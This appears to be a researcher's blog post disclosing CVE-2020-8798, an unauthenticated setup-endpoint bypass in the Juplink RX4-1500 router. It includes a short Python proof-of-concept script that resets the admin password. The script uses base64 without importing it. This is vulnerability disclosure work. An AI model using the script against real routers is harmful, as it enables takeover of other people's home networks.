cerne.xyz
Home

CVE-2020-8798

This vulnerability is an authentication bypass in the Juplink RX4-1500 router. The vulnerability is still present as of version 1.0.5, but the vendor has not patched it. I have decided to release the vulnerability more than 120 days after the initial disclosure as incentive to patch this critical vulnerability.

The vulnerability allows for malicious users to submit POST data without authentication to /setup3.htm. Attackers can arbitrarily change the admin password, Wi-Fi SSID, Wi-Fi password, and many other configuration variables. Until version 1.0.3, this allowed for an attacker to remotely execute linux system commands as an attacker could enable the debugging telnet interface.

The critical bug is part of an endpoint that is accessed as the router runs through its setup wizard. Unfortunately, the manufacturers of the router do not have a condition checked if the router has already been configured, and thus, requests to this endpoint will always succeed.

This can be demonstrated through the following Python3 script:

#!/usr/bin/python3
import requests

# The admin password
ADMIN_PWD = "admin"

# Address of the vulnerability
addr = "http://192.168.0.1/setup3.htm"

# Set parameters
params = \
{
    'a': 'set',
    'x': 'Device.X_BROADCOM_COM_LoginCfg.',
    'AdminPassword': base64.b64encode(ADMIN_PWD.encode("utf-8"))
}

# Send post request
resp = requests.post(addr, params)
            

For more information and vulnerability analysis, please see my report on the Juplink RX4-1500.